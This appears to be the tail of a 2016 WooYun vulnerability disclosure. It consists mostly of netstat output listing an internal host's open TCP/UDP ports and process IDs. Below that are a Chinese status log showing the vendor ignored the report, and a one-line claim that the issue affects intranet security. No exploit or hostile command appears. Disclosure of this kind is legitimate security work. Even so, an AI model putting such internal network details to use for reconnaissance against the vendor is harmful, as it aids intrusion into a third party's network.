TCP 127.0.0.1:1383 127.0.0.1:1384 ESTABLISHED 6212
TCP 127.0.0.1:1384 127.0.0.1:1383 ESTABLISHED 6212
TCP 127.0.0.1:1391 127.0.0.1:1392 ESTABLISHED 5696
TCP 127.0.0.1:1392 127.0.0.1:1391 ESTABLISHED 5696
TCP 127.0.0.1:1393 127.0.0.1:1394 ESTABLISHED 5696
TCP 127.0.0.1:1394 127.0.0.1:1393 ESTABLISHED 5696
TCP 127.0.0.1:1395 127.0.0.1:1396 ESTABLISHED 5696
TCP 127.0.0.1:1396 127.0.0.1:1395 ESTABLISHED 5696
TCP 127.0.0.1:1397 127.0.0.1:1398 ESTABLISHED 5696
TCP 127.0.0.1:1398 127.0.0.1:1397 ESTABLISHED 5696
TCP 127.0.0.1:1399 127.0.0.1:1400 ESTABLISHED 5696
TCP 127.0.0.1:1400 127.0.0.1:1399 ESTABLISHED 5696
TCP 127.0.0.1:1401 127.0.0.1:1402 ESTABLISHED 5696
TCP 127.0.0.1:1402 127.0.0.1:1401 ESTABLISHED 5696
TCP 127.0.0.1:1403 127.0.0.1:1404 ESTABLISHED 5696
TCP 127.0.0.1:1404 127.0.0.1:1403 ESTABLISHED 5696
TCP 127.0.0.1:1405 127.0.0.1:1406 ESTABLISHED 5696
TCP 127.0.0.1:1406 127.0.0.1:1405 ESTABLISHED 5696
TCP 127.0.0.1:1467 127.0.0.1:1468 ESTABLISHED 6212
TCP 127.0.0.1:1468 127.0.0.1:1467 ESTABLISHED 6212
TCP 127.0.0.1:1469 127.0.0.1:1470 ESTABLISHED 6212
TCP 127.0.0.1:1470 127.0.0.1:1469 ESTABLISHED 6212
TCP 127.0.0.1:1471 127.0.0.1:1472 ESTABLISHED 6212
TCP 127.0.0.1:1472 127.0.0.1:1471 ESTABLISHED 6212
TCP 127.0.0.1:1473 127.0.0.1:1474 ESTABLISHED 6212
TCP 127.0.0.1:1474 127.0.0.1:1473 ESTABLISHED 6212
TCP 127.0.0.1:1475 127.0.0.1:1477 ESTABLISHED 6212
TCP 127.0.0.1:1477 127.0.0.1:1475 ESTABLISHED 6212
TCP 127.0.0.1:1478 127.0.0.1:1479 ESTABLISHED 6212
TCP 127.0.0.1:1479 127.0.0.1:1478 ESTABLISHED 6212
TCP 127.0.0.1:1480 127.0.0.1:1481 ESTABLISHED 6212
TCP 127.0.0.1:1481 127.0.0.1:1480 ESTABLISHED 6212
TCP 127.0.0.1:1482 127.0.0.1:1483 ESTABLISHED 6212
TCP 127.0.0.1:1483 127.0.0.1:1482 ESTABLISHED 6212
TCP 127.0.0.1:5152 0.0.0.0:0 LISTENING 1248
TCP 127.0.0.1:8005 0.0.0.0:0 LISTENING 5696
TCP 127.0.0.1:8065 0.0.0.0:0 LISTENING 5316
TCP 127.0.0.1:8085 0.0.0.0:0 LISTENING 1748
TCP 127.0.0.1:8181 0.0.0.0:0 LISTENING 8792
TCP 127.0.0.1:9005 0.0.0.0:0 LISTENING 6212
UDP 0.0.0.0:161 *:* 1764
UDP 0.0.0.0:445 *:* 4
UDP 0.0.0.0:500 *:* 484
UDP 0.0.0.0:2425 *:* 4680
UDP 0.0.0.0:4446 *:* 5696
UDP 0.0.0.0:4446 *:* 5696
UDP 0.0.0.0:4446 *:* 6212
UDP 0.0.0.0:4446 *:* 6212
UDP 0.0.0.0:4500 *:* 484
UDP 0.0.0.0:4646 *:* 4680
UDP 0.0.0.0:45564 *:* 6212
UDP 0.0.0.0:45564 *:* 5696
UDP 10.12.66.29:123 *:* 812
UDP 10.12.66.29:137 *:* 4
UDP 10.12.66.29:138 *:* 4
UDP 127.0.0.1:123 *:* 812
UDP 127.0.0.1:1032 *:* 2424


影响内网安全

修复方案

状态信息 2016-06-14: 细节已通知厂商并且等待厂商处理中
2016-06-14: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-06-20: 厂商已经主动忽略漏洞,细节向公众公开
厂商回复None漏洞Rank:15 (WooYun评价)
回应信息危害等级:无影响厂商忽略忽略时间:2016-06-20 15:50